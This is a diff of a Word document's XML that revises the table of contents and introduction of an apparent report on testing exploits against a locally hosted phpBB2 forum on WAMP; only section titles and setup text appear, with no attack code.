+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693179" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+                <w:lang w:val="en"/>
+              </w:rPr>
+              <w:t>CSRF (Cross Site Forgery Request)/XSS attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693179 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1183,14 +1663,14 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495764" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693180" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>Enumerating Exploits</w:t>
+              <w:t>Penetration/Attack</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1211,7 +1691,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495764 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693180 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1231,7 +1711,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1250,10 +1730,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495765" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693181" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1265,7 +1747,9 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1276,7 +1760,7 @@
                 <w:noProof/>
                 <w:lang w:val="en"/>
               </w:rPr>
-              <w:t>DOS (Denial of service attack)</w:t>
+              <w:t>DOS (Denial of Service attack)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1297,7 +1781,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495765 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693181 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1317,7 +1801,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1336,22 +1820,25 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495766" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693182" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
                 <w:noProof/>
-                <w:lang w:val="en"/>
               </w:rPr>
               <w:t></w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1360,9 +1847,8 @@
                 <w:rStyle w:val="Hyperlink"/>
                 <w:b/>
                 <w:noProof/>
-                <w:lang w:val="en"/>
-              </w:rPr>
-              <w:t>Session Hijacking exploit</w:t>
+              </w:rPr>
+              <w:t>Execution of PHP code using profile signature</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1383,7 +1869,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495766 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693182 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1403,7 +1889,95 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693183" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Execution of arbitrary PHP code by exploiting template.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693183 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1426,14 +2000,13 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495767" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693184" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en"/>
-              </w:rPr>
-              <w:t>Penetration/Attack</w:t>
+              </w:rPr>
+              <w:t>Hardening exploits</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1454,7 +2027,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495767 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693184 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1474,7 +2047,271 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693185" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>DOS (Denial of Service) Attack</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693185 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693186" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Execution of PHP code using profile signature</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693186 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc448693187" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t></w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:b/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Execution of arbitrary PHP code by exploiting template.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693187 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1497,13 +2334,13 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495768" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693188" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Hardening exploits</w:t>
+              <w:t>Conclusion</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1524,7 +2361,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495768 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693188 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1544,7 +2381,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1567,13 +2404,13 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495769" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693189" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>Conclusion</w:t>
+              <w:t>References</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1594,7 +2431,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495769 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693189 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1614,7 +2451,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1637,13 +2474,13 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495770" w:history="1">
+          <w:hyperlink w:anchor="_Toc448693190" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>References</w:t>
+              <w:t>Appendix</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1664,7 +2501,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495770 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc448693190 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1684,77 +2521,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-              <w:noProof/>
-              <w:lang w:eastAsia="en-GB"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc446495771" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t>Appendix</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc446495771 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>4</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1779,9 +2546,9 @@
     </w:sdt>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Subtitle"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
           <w:spacing w:val="-10"/>
           <w:kern w:val="28"/>
           <w:sz w:val="56"/>
@@ -1789,9 +2556,6 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
@@ -1803,7 +2567,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc446495289"/>
-      <w:bookmarkStart w:id="1" w:name="_Toc446495758"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc448693170"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
@@ -1824,15 +2588,141 @@
         <w:spacing w:after="0"/>
       </w:pPr>
       <w:r>
-        <w:t>For the purpose of this experiment version 1.7.0 of WAMP has been installed. A PHP forum has been configured on the locally hosted WAMP to practice and test vulnerability exploits of the PHP forum. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 and 2.0.19 although vulnerabilities of other versions have also been explored.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>For the purpose of this experiment version 1.7.0 of WAMP has been installed</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [1]</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. A PHP forum has been configured on the locally hosted WAMP to practice and test vulnerability exploits of the PHP forum</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> as seen in figure 1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. The main version of PHPBB focused on in this investigation is phpBB2-2.0.23 and 2.0.19 although vulnerabilities of other versions have also been explored.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Older versions of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phpBB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> library are available to download online [</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>].</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
         <w:t>There are a wide range of readily available third party software and net based vulnerability scanning tools available for penetration testing a targeted site. The majority of these tools can be used unlawfully without the proper permissions to scan the target website.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34E35D49" wp14:editId="117E764A">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>239395</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4930775" cy="2620010"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="8890"/>
+            <wp:wrapSquare wrapText="bothSides"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4930775" cy="2620010"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="page">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="page">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>igure 1.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHPBB forum running on local host WAMP</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1844,6 +2734,15 @@
         </w:rPr>
       </w:pPr>
     </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -1853,7 +2752,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="_Toc446495290"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc446495759"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc448693171"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
@@ -1861,51 +2760,13 @@
         <w:t>Method</w:t>
       </w:r>
       <w:bookmarkEnd w:id="2"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+        </w:rPr>
+        <w:t>/Foot-Printing</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="0"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc446495291"/>
-      <w:bookmarkStart w:id="5" w:name="_Toc446495760"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Foot-Printing</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
